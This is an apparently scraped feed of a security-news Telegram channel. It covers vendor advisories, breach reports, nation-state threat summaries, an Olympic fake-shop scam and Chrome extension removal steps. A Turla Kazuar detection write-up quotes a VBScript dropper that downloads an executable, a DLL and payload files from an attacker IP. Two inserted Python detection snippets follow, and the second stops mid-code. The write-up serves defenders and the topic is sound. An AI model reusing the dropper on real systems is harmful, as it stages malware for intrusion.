malwarenews | Unsorted

Telegram channel malwarenews - Malware News

The most relevant and recent events in the world of information security https://malware.news All Projects: malwarecorp.com This channel is run by AI and BOT

Malware News

Secure Access Service Edge (SASE)

What is Secure Access Service Edge? Secure Access Service Edge (SASE) is a cloud-based approach that combines networking and security into one service so people can safely connect to company resources from anywhere. SASE represents a fundamental shift in how organizations approach network security and connectivity in today’s distributed work environment. Rather than treating networking ...


Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.


Article Link:
Secure Access Service Edge (SASE) - Arctic Wolf

1 post - 1 participant

Read full topic

https://malware.news/t/secure-access-service-edge-sase/104114
https://malware.news/c/news.rss

Project: @MalwareNews
Private:
@MalwarePrivateBot
Group:
@MalwareForums
Powered by
@MalwareForum

Read more…

Malware News

Check Point Unveils a New Security Strategy for Enterprises in the AI Age


Check Point is rolling out a new four-pillar cybersecurity strategy to give security teams an edge in the ongoing AI arms race with threat actors and is making three acquisitions that will play a critical role in getting it going.

The post Check Point Unveils a New Security Strategy for Enterprises in the AI Age appeared first on Security Boulevard.

Article Link:
Check Point Unveils a New Security Strategy for Enterprises in the AI Age - Security Boulevard

https://malware.news/t/check-point-unveils-a-new-security-strategy-for-enterprises-in-the-ai-age/104112

Malware News

NDSS 2025 – Density Boosts Everything

Session 12B: Malware


Authors, Creators & Presenters: Jianwen Tian (Academy of Military Sciences), Wei Kong (Zhejiang Sci-Tech University), Debin Gao (Singapore Management University), Tong Wang (Academy of Military Sciences), Taotao Gu (Academy of Military Sciences), Kefan Qiu (Beijing Institute of Technology), Zhi Wang (Nankai University), Xiaohui Kuang (Academy of Military Sciences)

PAPER

Density Boosts Everything: A One-stop Strategy For Improving Performance, Robustness, And Sustainability of Malware Detectors

In the contemporary landscape of cybersecurity, AI-driven detectors have emerged as pivotal in the realm of malware detection. However, existing AI-driven detectors encounter a myriad of challenges, including poisoning attacks, evasion attacks, and concept drift, which stem from the inherent characteristics of AI methodologies. While numerous solutions have been proposed to address these issues, they often concentrate on isolated problems, neglecting the broader implications for other facets of malware detection. This paper diverges from the conventional approach by not targeting a singular issue but instead identifying one of the fundamental causes of these challenges, sparsity. Sparsity refers to a scenario where certain feature values occur with low frequency, being represented only a minimal number of times across the dataset. The authors are the first to elevate the significance of sparsity and link it to core challenges in the domain of malware detection, and then aim to improve performance, robustness, and sustainability simultaneously by solving sparsity problems. To address the sparsity problems, a novel compression technique is designed to effectively alleviate the sparsity. Concurrently, a density boosting training method is proposed to consistently fill sparse regions. Empirical results demonstrate that the proposed methodologies not only successfully bolster the model's resilience against different attacks but also enhance the performance and sustainability over time. Moreover, the proposals are complementary to existing defensive technologies and successfully demonstrate practical classifiers with improved performance and robustness to attacks.

ABOUT NDSS

The Network and Distributed System Security Symposium (NDSS) fosters information exchange among researchers and practitioners of network and distributed system security. The target audience includes those interested in practical aspects of network and distributed system security, with a focus on actual system design and implementation. A major goal is to encourage and enable the Internet community to apply, deploy, and advance the state of available security technologies.

Our thanks to the Network and Distributed System Security (NDSS) Symposium for publishing their Creators, Authors and Presenters’ superb NDSS Symposium 2025 Conference content on the Organization’s YouTube Channel.


The post NDSS 2025 – Density Boosts Everything appeared first on Security Boulevard.

Article Link:
NDSS 2025 - Density Boosts Everything - Security Boulevard

https://malware.news/t/ndss-2025-density-boosts-everything/104110

Malware News

Google Chrome security advisory (AV26-126)


Serial number: AV26-126
Date: February 13, 2026

On February 12, 2026, Google published a security advisory to address vulnerabilities in the following product:

— Stable Channel Chrome for Desktop – versions prior to 145.0.7632.68 (Windows/Mac) and 144.0.7559.67 (Linux)

The Cyber Centre encourages users and administrators to review the provided web link and apply the necessary updates, when available.

Google Chrome Security Advisory


Article Link:
Google Chrome security advisory (AV26-126) - Canadian Centre for Cyber Security

https://malware.news/t/google-chrome-security-advisory-av26-126/104108

Malware News

Detection: Satellite DLL Sideloading via MFC — TURLA’S KAZUAR V3

Very good everyone.

Turla’s Kazuar is a .NET malware family attributed to Russian state-sponsored actors that, in recent campaigns, has taken DLL SideLoading a step further by leveraging certain MFC binaries compiled between Visual Studio .NET 2002 and Visual Studio 2010. These binaries attempt to load satellite DLLs in an insecure way due to an incorrect path specification, improper handling of data during loading, and a very curious “fallback” logic.

In this article we will model the early stages of the kill chain of this attack on a Windows endpoint, from the initial vector to the loader, where we will observe:

— Dropping files into user-writable paths (AppData/Temp/ProgramData) originating from scripting engines.
— Execution of a legitimate binary from an anomalous location.
— The loading of a DLL by the previous binary, both sharing a very similar naming convention.
— How these drop, load, and execution events show a clear correlation when modeling detection.

Let’s rock!

OVERVIEW — GENERAL FUNCTIONS

Execution begins with a Visual Basic script without encoded strings; at first glance it may seem harmless. It is unknown whether the user executed the script as a result of social engineering or whether it was launched programmatically after a previous foothold.

'On Error Resume Next
const SXH_SERVER_CERT_IGNORE_ALL_SERVER_ERRORS = 13056
host = "https://185.126.255[.]132"

Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFolder = objFSO.CreateFolder(CreateObject("WScript.Shell").ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\Programs\HP")
Set objFolder = objFSO.CreateFolder(CreateObject("WScript.Shell").ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\Programs\HP\Printer")
Set objFolder = objFSO.CreateFolder(CreateObject("WScript.Shell").ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\Programs\HP\Printer\Driver")

conc = host + "/hpbprndi.exe"
Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
Set WSHShell = CreateObject("WScript.Shell")
objHttp.Option(4) = 13056
objHTTP.Open "GET", conc, False
objHttp.Send
outFile=WSHShell.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\Programs\HP\Printer\Driver\hpbprndi.exe"
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1
stream.Open
stream.Write objHttp.ResponseBody
stream.SaveToFile outFile, 2
stream.Close

conc = host + "/hpbprndiLOC.dll"
objHttp.Option(4) = 13056
objHTTP.Open "GET", conc, False
objHttp.Send
outFile=WSHShell.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\Programs\HP\Printer\Driver\hpbprndiLOC.dll"
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1
stream.Open
stream.Write objHttp.ResponseBody
stream.SaveToFile outFile, 2
stream.Close

conc = host + "/jayb.dadk"
objHttp.Option(4) = 13056
objHTTP.Open "GET", conc, False
objHttp.Send
outFile=WSHShell.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\Programs\HP\Printer\Driver\jayb.dadk"
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1
stream.Open
stream.Write objHttp.ResponseBody
stream.SaveToFile outFile, 2
stream.Close

conc = host + "/kgjlj.sil"
objHttp.Option(4) = 13056
objHTTP.Open "GET", conc, False
objHttp.Send
outFile=WSHShell.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\Programs\HP\Printer\Driver\kgjlj.sil"
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1
stream.Open
stream.Write objHttp.ResponseBody
stream.SaveToFile outFile, 2
stream.Close

conc = host + "/pkrfsu.ldy"
objHttp.Option(4) = 13056
objHTTP.Open "GET", conc, False
objHttp.Send
outFile=WSHShell.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\Programs\HP\Printer\Driver\pkrfsu.ldy"
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1
stream.Open
stream.Write objHttp.ResponseBody
stream.SaveToFile outFile,...
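As an added example (not code from the original article), the following Python correlates a constructed Sysmon-style event timeline into the drop, execute and sideload chain the article sets out to model: a script engine writing into a user-writable path, the dropped binary starting from that path, and a similarly named DLL loading from the same folder. The event schema, time window and sample timeline are assumptions; only the file names and drop folder come from the dropper script above.

```python
# Added example: correlate endpoint events into the drop -> execute -> sideload chain.
# Event shape, field names and the sample timeline are assumptions; the paths and
# file names (hpbprndi.exe / hpbprndiLOC.dll under %LOCALAPPDATA%\Programs\HP\...)
# are taken from the dropper script discussed in the article.
from dataclasses import dataclass
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

# Scripting engines that should rarely be the writer of PE files in user-writable paths
SCRIPT_ENGINES = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
# User-writable roots the article calls out (matched case-insensitively on the path)
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\temp\\", "\\programdata\\")


@dataclass
class Event:
    ts: datetime
    kind: str      # "file_create" (EID 11), "process_create" (EID 1) or "image_load" (EID 7)
    pid: int       # owning process id (for process_create: the new process)
    image: str     # writing process / parent process / loading process image path
    target: str    # file written / process started / DLL loaded


def is_user_writable(path: str) -> bool:
    return any(marker in path.lower() for marker in USER_WRITABLE_MARKERS)


def is_script_engine(image: str) -> bool:
    return PureWindowsPath(image).name.lower() in SCRIPT_ENGINES


def names_similar(exe_path: str, dll_path: str) -> bool:
    """hpbprndi.exe loading hpbprndiLOC.dll: the DLL stem extends the EXE stem,
    the satellite-DLL naming pattern the MFC lookup keys on."""
    exe = PureWindowsPath(exe_path).stem.lower()
    dll = PureWindowsPath(dll_path).stem.lower()
    return len(exe) >= 4 and dll != exe and dll.startswith(exe)


def correlate(events, window=timedelta(minutes=10)):
    """One alert per process that (1) was dropped by a script engine into a
    user-writable path, (2) started from that path and (3) loaded a similarly
    named DLL from the same folder, all within `window` of the drop."""
    drops = {}      # lower-cased dropped path -> (drop time, dropper image)
    launched = {}   # pid -> (start time, exe path) for processes run from user-writable paths
    alerts = []
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.kind == "file_create":
            if is_script_engine(ev.image) and is_user_writable(ev.target):
                drops[ev.target.lower()] = (ev.ts, ev.image)
        elif ev.kind == "process_create":
            if is_user_writable(ev.target):
                launched[ev.pid] = (ev.ts, ev.target)
        elif ev.kind == "image_load" and ev.pid in launched:
            _, exe = launched[ev.pid]
            same_dir = PureWindowsPath(exe).parent == PureWindowsPath(ev.target).parent
            dropped = drops.get(exe.lower())
            if (same_dir and names_similar(exe, ev.target)
                    and dropped and ev.ts - dropped[0] <= window):
                alerts.append({
                    "pid": ev.pid,
                    "exe": exe,
                    "dll": ev.target,
                    "dropper": dropped[1],
                    "dll_also_dropped": ev.target.lower() in drops,
                })
    return alerts


T0 = datetime(2026, 2, 13, 12, 0, 0)
DRV = r"C:\Users\alice\AppData\Local\Programs\HP\Printer\Driver"
WSCRIPT = r"C:\Windows\System32\wscript.exe"
# Constructed timeline: the dropper stage from the script above, the sideload,
# and a benign HP binary performing the same load from Program Files (no alert).
SAMPLE_EVENTS = [
    Event(T0, "file_create", 1200, WSCRIPT, DRV + r"\hpbprndi.exe"),
    Event(T0 + timedelta(seconds=1), "file_create", 1200, WSCRIPT, DRV + r"\hpbprndiLOC.dll"),
    Event(T0 + timedelta(seconds=2), "file_create", 1200, WSCRIPT, DRV + r"\jayb.dadk"),
    Event(T0 + timedelta(seconds=5), "process_create", 4321, WSCRIPT, DRV + r"\hpbprndi.exe"),
    Event(T0 + timedelta(seconds=6), "image_load", 4321, DRV + r"\hpbprndi.exe",
          DRV + r"\hpbprndiLOC.dll"),
    Event(T0 + timedelta(minutes=1), "process_create", 5555, r"C:\Windows\explorer.exe",
          r"C:\Program Files\HP\hpbprndi.exe"),
    Event(T0 + timedelta(minutes=1, seconds=1), "image_load", 5555,
          r"C:\Program Files\HP\hpbprndi.exe", r"C:\Program Files\HP\hpbprndiLOC.dll"),
]


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

Only the process started from the AppData folder raises an alert; the same binary and DLL pair under Program Files is ignored because the location is not user-writable and nothing was dropped there by a script engine.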


https://malware.news/t/detection-satelital-dll-sideloading-via-mfc-turla-s-kazuar-v3/104106

Malware News

PostgreSQL security advisory (AV26-125)


Serial number: AV26-125
Date: February 13, 2026

On February 12, 2026, PostgreSQL published a security advisory to address vulnerabilities in the following products:

— PostgreSQL – 14.x versions prior to 14.21
— PostgreSQL – 15.x versions prior to 15.16
— PostgreSQL – 16.x versions prior to 16.12
— PostgreSQL – 17.x versions prior to 17.8
— PostgreSQL – 18.x versions prior to 18.2

The Cyber Centre encourages users and administrators to review the provided web links and apply the necessary updates.

PostgreSQL 18.2, 17.8, 16.12, 15.16, and 14.21 Released!
PostgreSQL Security Information


Article Link:
PostgreSQL security advisory (AV26-125) - Canadian Centre for Cyber Security

https://malware.news/t/postgresql-security-advisory-av26-125/104104

Malware News

Korea’s Personal Information Protection Commissioner fines 3 LVMH luxury brands after Salesforce data breaches

The South Korean regulator has imposed fines on three LVMH luxury brands in the wake of data breaches previously reported on this site. A machine translation of the South Korean notice indicates that the Personal Information Protection Commission imposed fines of 36.033 billion won (USD $24,925,824.15) and penalties of 10.8 million won ($7,472.78) on three luxury...



Article Link:
Korea’s Personal Information Protection Commissioner fines 3 LVMH luxury brands after Salesforce data breaches – DataBreaches.Net

https://malware.news/t/korea-s-personal-information-protection-commissioner-fines-3-lvmh-luxury-brands-after-salesforce-data-breaches/104102

Malware News

Top Nation-State Cyber Threats Targeting the United States

Most cyber risk in the United States starts with something simple: stolen data and stolen access getting traded for profit. In SOCRadar’s 2026 U.S. Threat Landscape Report, selling made up 70.76% of observed Dark Web activity. In other words, attackers kept feeding a marketplace where credentials and entry points move quickly from one hand to another.

That matters because it shapes the environment nation-state operators work in. They do not need to “invent” new entry paths when the underground economy already supplies access, phishing kits, and infrastructure at scale. At the same time, the motives diverge. Many criminal crews chase payment, but state-linked groups often chase long-term visibility: the inboxes, identity systems, telecom environments, and third-party pathways that influence decisions, expose relationships, or enable quiet persistence.

This post focuses on that second category. It breaks down the state-linked clusters most worth tracking, what they typically target in the United States, and the patterns behind how they run these operations.

Nation-state threats targeting the U.S.

For wider U.S.-specific context beyond nation-state activity, SOCRadar’s 2026 U.S. Threat Landscape Report also covers the most targeted industries, how threat actors monetize stolen data and access, and how ransomware, phishing, and DDoS continue to pressure U.S. organizations.

China-Related Espionage and Long-Dwell Access
China-nexus operations tend to prioritize intelligence collection, persistent access, and strategic positioning inside communications and government-adjacent environments. In practice, that often means targeting email, identity, and infrastructure that enables downstream visibility into sensitive conversations.

Salt Typhoon
Salt Typhoon became a widely cited example of access that matters rather than smash-and-grab theft: get inside the pipes, stay quiet, and collect.

Threat actor card of Salt Typhoon

In January 2026, Salt Typhoon compromised email systems used by staff associated with major U.S. House committees, with uncertainty at the time about the depth of access and whether lawmakers’ emails were compromised.

A February 2026 Senate letter framed this activity as part of broader telecom security concerns and urged an oversight hearing with major carriers, including AT&T and Verizon. It also referenced FBI-reported scope, describing targeting of more than 200 U.S. organizations and activity spanning 80 countries, while citing reporting that the actors may have remained inside U.S. telecom networks.

A state-level advisory-style recap from NJCCIC also summarized the committee-email targeting and reinforced the telecom-focused context.

How these operations tend to work

— Target the communications layer to gain strategic collection options (email systems, telecom environments, and the identity infrastructure around them).
— Prioritize persistence so access survives password resets and partial remediation cycles.
— Blend technical access with operational security, keeping activity low-noise and selective.

APT5
APT5 activity tied to U.S. and allied defense ecosystems showed a different but complementary approach: target people with believable context, including outside corporate controls.

A recent Google threat intelligence write-up described APT5 spearphishing campaigns that went after current and former employees of major aerospace and defense contractors, including messages...

https://malware.news/t/top-nation-state-cyber-threats-targeting-the-united-states/104097

Malware News

Fake shops target Winter Olympics 2026 fans

If you’ve seen the two stoat siblings serving as official mascots of the Milano Cortina 2026 Winter Olympics, you already know Tina and Milo are irresistible.


Designed by Italian schoolchildren and chosen from more than 1,600 entries in a public poll, the duo has already captured hearts worldwide. So much so that the official 27 cm Tina plush toy on the official Olympics web shop is listed at €40 and currently marked out of stock.

Tina and Milo are in huge demand, and scammers have noticed.

When supply runs out, scam sites rush in
In roughly the past week alone, we’ve identified nearly 20 lookalike domains designed to imitate the official Olympic merchandise store.

These aren’t crude copies thrown together overnight. The sites use the same polished storefront template, complete with promotional videos and background music designed to mirror the official shop.olympics.com experience.

Fake site offering Tina at a huge discount

Real Olympic site showing Tina out of stock

The layout and product pages are the same—the only thing that changes is the domain name. At a quick glance, most people wouldn’t notice anything unusual.

Here’s a sample of the domains we’ve been tracking:


Based on telemetry, additional registrations are actively emerging.

Reports show users checking these domains from multiple regions including Ireland, the Czech Republic, the United States, Italy, and China—suggesting this is a global campaign targeting fans worldwide.

Malwarebytes blocks these domains as scams.

Anatomy of a fake Olympic shop
The fake sites are practically identical. Each one loads the same storefront, with the same layout, product pages, and promotional banners.

That’s usually a sign the scammers are using a ready-made template and copying it across multiple domains. One obvious giveaway, however, is the pricing.

On the official store, the Tina plush costs €40 and is currently out of stock. On the fake sites, it suddenly reappears at a hugely discounted price—in one case €20, with banners shouting “UP & SAVE 80%.” When an item is sold out everywhere official and a random .top domain has it for half price, you’re looking at bait.

The goal of these sites typically includes:

— Stealing payment card details entered at checkout
— Harvesting personal information such as names, addresses, and phone numbers
— Sending follow-up phishing emails
— Delivering malware through fake order confirmations or “tracking” links
— Taking your money and shipping nothing at all

The Olympics are a scammer’s playground
This isn’t the first time cybercriminals have piggybacked on Olympic fever. Fake ticket sites proliferated as far back as the Beijing 2008 Games. During Paris 2024, analysts observed significant spikes in Olympics-themed phishing and DDoS activity.

The formula is simple. Take a globally recognized brand, add urgency and emotional appeal (who doesn’t want an adorable stoat plush for their kid?), mix in limited availability, and serve it up on a convincing-looking website. With over 3 billion viewers expected for Milano Cortina, the pool of potential victims is...


https://malware.news/t/fake-shops-target-winter-olympics-2026-fans/104095

Malware News

AI-Powered Knowledge Graph Generator & APTs, (Thu, Feb 12th)

Unstructured text to interactive knowledge graph via LLM & SPO triplet extraction


Article Link:
AI-Powered Knowledge Graph Generator & APTs - SANS ISC

https://malware.news/t/ai-powered-knowledge-graph-generator-apts-thu-feb-12th/104093

Malware News

AI Weaponization: State Hackers Using Google Gemini for Espionage and Malware Generation

What Happened Google’s Threat Intelligence Group (GTIG) has confirmed that multiple state-sponsored hacking groups are actively using its Gemini large language model (LLM) to enhance their cyber espionage and attack capabilities. The activity spans reconnaissance, social engineering, vulnerability analysis, and the dynamic generation of malicious code. North Korean (UNC2970/Lazarus Group), Chinese (Mustang Panda, APT31, APT41), [...]


Article Link:
AI Weaponization: State Hackers Using Google Gemini for Espionage and Malware Generation - Cyberwarzone

https://malware.news/t/ai-weaponization-state-hackers-using-google-gemini-for-espionage-and-malware-generation/104090

Malware News

The Most Important Thing I’ve Read This Year

Lawyers and judges need to stop snickering at the sad sacks who file briefs citing hallucinated authorities and treating those ...

Article Link:
The Most Important Thing I’ve Read This Year | Ball in your Court

https://malware.news/t/the-most-important-thing-i-ve-read-this-year/104088

Malware News

It’s 2026, but hospitals still haven’t prevented snooping in celebrities’ records

DataBreaches is not on TikTok and, being something of a dinosaur, never heard of “Josh and Jase” before. But no patient should have their privacy violated the ways Josh’s was. What happened to “break the glass?” What happened to all the software and auditing protections to prevent hospital employees from snooping on celebrity patients’ records?..



Article Link:
It’s 2026, but hospitals still haven’t prevented snooping in celebrities’ records – DataBreaches.Net

https://malware.news/t/it-s-2026-but-hospitals-still-haven-t-prevented-snooping-in-celebrities-records/104086

Malware News

ApolloMD reveals that 626,540 patients were affected by May, 2025 cyberattack

There is an update to a breach previously reported on DataBreaches.net. ApolloMD describes itself as a private, independent group of physicians that partners with more than 100 hospitals nationwide to provide integrated, multispecialty physician, Ambulatory Payment Classifications (APCs), and practice management services. As such, they are business associates of HIPAA-covered entities. This week, the Georgia-based...



Article Link:
ApolloMD reveals that 626,540 patients were affected by May, 2025 cyberattack – DataBreaches.Net

https://malware.news/t/apollomd-reveals-that-626-540-patients-were-affected-by-may-2025-cyberattack/104084

Malware News

Threat Intelligence Snapshot: Week 7, 2026

QuoIntelligence’s Weekly Intelligence Snapshot for the week of 5 to 11 February 2026 is now available!


Cyber Highlights
Industry impacted: Communication Services, Consumer Discretionary, Consumer Staples, Energy, Financials, Government, Health Care, Industrials, Information Technology, Materials, Real Estate, Utilities

Microsoft Exchange URL Rule Error Triggers Widespread Email Quarantine
ZeroDayRAT Cross Platform Android and iOS Spyware with Broad Surveillance Capabilities
SSHStalker Campaign Demonstrating Automated SSH Compromise and IRC‑based Botnet Control
Researchers Find Rogue Virtual Machine Revealing Scattered Spider’s New Operational Methods
DPRK Operatives Exploit Verified LinkedIn Profiles for Remote‑Work Fraud
Abuse of Net Monitor and SimpleHelp for Dual Remote Access in Ransomware and Cryptocurrency Theft Operations
URL Hijack in Outlook Add‑In Leads to Unauthorized Credential Collection

Geopolitical and Policy Highlights
Industry impacted: Government

European Commission Launches Action Plan to Address Drone Security Risks
EU Implements 20th Sanctions Package to Sustain Strategic Pressure on Russia Amid War in Ukraine

The post Threat Intelligence Snapshot: Week 7, 2026 appeared first on QuoIntelligence.

Article Link:
Threat Intelligence Snapshot: Week 7, 2026 - QuoIntelligence

https://malware.news/t/threat-intelligence-snapshot-week-7-2026/104082

Malware News

South Korea blames Coupang data breach on management failure, not sophisticated attack

Heekyong Yang and Hyunjoo Jin report: South Korean officials blamed a massive data leak last year at Coupang on management failure, rather than a sophisticated cyberattack, and urged the e-commerce giant to fix vulnerabilities in its security systems. Announcing the first findings of a government-led probe, the Science Ministry said on Tuesday a former Coupang...



Article Link:
South Korea blames Coupang data breach on management failure, not sophisticated attack – DataBreaches.Net

https://malware.news/t/south-korea-blames-coupang-data-breach-on-management-failure-not-sophisticated-attack/104113

Malware News

CISA to furlough most of its workforce under impending DHS shutdown

A likely partial government shutdown after Friday would impair the Cybersecurity and Infrastructure Security Agency’s operations, leading to diminished capabilities in critical areas including cyber response, security assessments, stakeholder engagements, training exercises and special event planning, a top official said this week.


CISA would furlough a majority of its workforce and just one-third would remain on the job under shutdown conditions, agency acting director Madhu Gottumukkala told House appropriators on Wednesday.

“I want to be clear — when the government shuts down, cyber threats do not,” he said.

The impending shutdown of the Department of Homeland Security — CISA’s parent agency — comes after Congress granted the department a two-week funding extension following high-profile Immigration and Customs Enforcement shootings in Minneapolis. Democrats have seized upon those incidents to advocate for funding overhauls for ICE and U.S. Customs and Border Protection, which have played central roles in the Trump administration’s maximalist deportation efforts.

The cyberdefense agency’s work would be “strictly limited to those that are essential to protecting life and property” and available staff will “only look at anything that is an immediate need and an imminent threat,” said Gottumukkala, adding that the agency will be unable to proactively scan for cyber vulnerabilities.

The shutdown would also slow ongoing revamps of a major cyber incident reporting rule that was signed into law in 2022, he said. The Cyber Incident Reporting for Critical Infrastructure Act directed CISA to enact a final rule by October 2025, though that deadline has been extended to this May. CISA announced (https://public-inspection.federalregister.gov/2026-02948.pdf) a series of listening sessions for CIRCIA on Thursday.

The cyberdefense agency has already lost approximately one-third of its workforce over the past year amid various Trump 2.0 efficiency plans and mechanisms aimed at shedding purported government bloat and wasteful spending.

Article Link:
CISA to furlough most of its workforce under impending DHS shutdown - Nextgov/FCW

https://malware.news/t/cisa-to-furlough-most-of-its-workforce-under-impending-dhs-shutdown/104111

Malware News

HPE security advisory (AV26-127)


Serial number: AV26-127
Date: February 13, 2026

On February 12, 2026, HPE published security advisories to address vulnerabilities in the following products:

— HPE SimpliVity 380 Gen11 – versions prior to SimpliVity Support Pack Gen11 (SVTSPGen11) 2026_0116
— HPE SimpliVity 380 Gen10 Plus – versions prior to SimpliVity Support Pack Gen10 (SVTSPGen10) 2026_0116

The Cyber Centre encourages users and administrators to review the provided web links and apply the necessary updates.

HPESBHF04937 rev.1 - Certain HPE SimpliVity Servers Using Certain Intel Processors, INTEL-SA-01280, 2025.3 IPU, Intel Chipset Firmware Advisory, Multiple Vulnerabilities
HPESBHF04938 rev.1 - Certain HPE SimpliVity Servers Using Certain Intel Processors, INTEL-SA-01313, 2025.3 IPU, Intel Xeon Processor Firmware Advisory, Multiple Vulnerabilities
HPESBHF04939 rev.1 - Certain HPE SimpliVity Servers Using Certain Intel Processors, INTEL-SA-01312, Intel TDX Module Advisory, Multiple Vulnerabilities
HPE Security Bulletin Library


Article Link:
https://cyber.gc.ca/en/alerts-advisories/hpe-security-advisory-av26-127

https://malware.news/t/hpe-security-advisory-av26-127/104109

Malware News

Summary of malicious campaigns in the week of 7 – 13 February

This week, CERT-AGID detected and analysed, within the Italian scenario it monitors, a total of 108 malicious campaigns, 68 of which had Italian targets and 40 of which were generic campaigns that nonetheless affected Italy, and made the 882 related indicators of compromise (IoC) it identified available to its accredited entities.


Article Link:
Summary of malicious campaigns in the week of 7 – 13 February – CERT-AGID

https://malware.news/t/sintesi-riepilogativa-delle-campagne-malevole-nella-settimana-del-7-13-febbraio/104107

Malware News

MITRE ATT&CK® Framework Beginners Guide


This guide is designed to give you a comprehensive understanding of the MITRE ATT&CK Framework and to explore how you can use it in your organization.

Article Link:
MITRE ATT&CK® Framework Beginners Guide

https://malware.news/t/mitre-att-ck-framework-beginners-guide/104105

Malware News

How to find and remove credential-stealing Chrome extensions

Researchers have found yet another family of malicious extensions in the Chrome Web Store. This time, 30 different Chrome extensions were found stealing credentials from more than 260,000 users.


The extensions rendered a full-screen iframe pointing to a remote domain. This iframe overlaid the current webpage and visually appeared as the extension’s interface. Because this functionality was hosted remotely, it was not included in the review that allowed the extensions into the Web Store.

In other recent findings, we reported on extensions spying on ChatGPT chats, sleeper extensions that monitored browser activity, and a fake extension that deliberately caused a browser crash.

To spread the risk of detections and take-downs, the attackers used a technique known as “extension spraying.” This means they used different names and unique identifiers for basically the same extension.

What often happens is that researchers provide a list of extension names and IDs, and it’s up to users to figure out whether they have one of these extensions installed.

Searching by name is easy when you open your “Manage extensions” tab, but unfortunately extension names are not unique. You could, for example, have the legitimate extension installed that a criminal tried to impersonate.

Searching by unique identifier
For Chrome and Edge, a browser extension ID is a unique 32‑character string of lowercase letters that stays the same even if the extension is renamed or reshipped.

When we’re looking at the extensions from a removal angle, there are two kinds: those installed by the user, and those force‑installed by other means (network admin, malware, Group Policy Object (GPO), etc.).

We will only look at the first type in this guide—the ones users installed themselves from the Web Store. The guide below is aimed at Chrome, but it’s almost the same for Edge.

How to find installed extensions
You can review the installed Chrome extensions like this:

— In the address bar type chrome://extensions/.
— This will open the Extensions tab and show you the installed extensions by name.
— Now toggle Developer mode to on and you will also see their unique ID.

Don’t remove this one. It’s one of the good ones.

Removal method in the browser
Use the Remove button to get rid of any unwanted entries.

If it disappears and stays gone after restart, you’re done. If there is no Remove button, or Chrome says it’s “Installed by your administrator,” or the extension reappears after a restart, there’s a policy, registry entry, or malware forcing it.

Alternative
You can also search the Extensions folder directly. On Windows systems this folder lives here:
C:\Users\<your‑username>\AppData\Local\Google\Chrome\User Data\Default\Extensions.

Please note that the AppData folder is hidden by default. To unhide files and folders in Windows, open Explorer, click the View tab (or menu), and check the Hidden items box. For more advanced options, choose Options > Change folder and search options > View tab, then select Show hidden files, folders, and drives.

Chrome extensions folder

You can organize the list alphabetically by clicking on the Name column header once or twice. This makes it easier to find extensions if you have a lot of them installed.

Deleting the extension folder here has one downside. It leaves an orphaned entry in your browser. When you start Chrome again after doing this, the extension will no longer load because its files are gone. But it will still show up in the...
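Checking the IDs in that folder against a researcher-published list by hand is error-prone, so here is an added example (not code from the original article) that does the comparison for you: it walks Extensions/<id>/<version>/manifest.json, the layout described above, and matches on the 32-character ID rather than on the name, since names can be impersonated. The IDs in KNOWN_BAD_IDS and the sample tree created by build_fixture() are constructed placeholders, not real extensions.

```python
"""Match installed Chrome extension IDs against a published list (added example).

Walks Extensions/<32-char id>/<version>/manifest.json, the folder the article
names, and matches on the ID because display names are not unique. KNOWN_BAD_IDS
and the tree built by build_fixture() are constructed placeholders.
"""
from __future__ import annotations

import json
import os
import re
import tempfile
from pathlib import Path

# Chrome/Edge IDs are 32 lowercase letters from a-p (hex digits mapped to letters).
EXTENSION_ID_RE = re.compile(r"^[a-p]{32}$")

# Constructed placeholder standing in for a researcher-published list of IDs.
KNOWN_BAD_IDS = {"abcdefghijklmnopabcdefghijklmnop"}

# The folder the article points at; LOCALAPPDATA is only set on Windows.
DEFAULT_ROOT = Path(os.environ.get("LOCALAPPDATA", "")) / "Google/Chrome/User Data/Default/Extensions"


def is_extension_id(value: str) -> bool:
    """True if value has the shape of a Chrome extension ID."""
    return EXTENSION_ID_RE.fullmatch(value) is not None


def read_manifest_name(manifest: dict) -> str:
    """Display name; localized manifests carry a __MSG_key__ placeholder instead."""
    name = manifest.get("name", "")
    if name.startswith("__MSG_") and name.endswith("__"):
        return f"(localized: {name})"
    return name or "(unnamed)"


def scan_extensions(root: Path) -> list[dict]:
    """List every <root>/<id>/<version>/manifest.json as a dict, sorted by ID."""
    found = []
    if not root.is_dir():
        return found
    for id_dir in sorted(root.iterdir()):
        if not (id_dir.is_dir() and is_extension_id(id_dir.name)):
            continue  # Temp folders and stray files are not extensions
        for version_dir in sorted(id_dir.iterdir()):
            manifest_path = version_dir / "manifest.json"
            if not manifest_path.is_file():
                continue
            try:
                manifest = json.loads(manifest_path.read_text(encoding="utf-8-sig"))
            except (OSError, json.JSONDecodeError):
                manifest = {}  # Still report the ID; a broken manifest is itself worth a look
            found.append({
                "id": id_dir.name,
                "version": manifest.get("version", version_dir.name),
                "name": read_manifest_name(manifest),
                "path": str(version_dir),
            })
    return found


def flag_reported(found: list[dict], bad_ids: set[str]) -> list[dict]:
    """Keep only entries whose ID is on the list; a matching name alone proves nothing."""
    return [ext for ext in found if ext["id"] in bad_ids]


def build_fixture(base: Path | None = None) -> Path:
    """Constructed sample tree: one reported ID and a same-named extension with a clean ID."""
    root = (base or Path(tempfile.mkdtemp())) / "Extensions"
    samples = {
        "abcdefghijklmnopabcdefghijklmnop": ("Coupon Helper", "1.2.0"),  # on KNOWN_BAD_IDS
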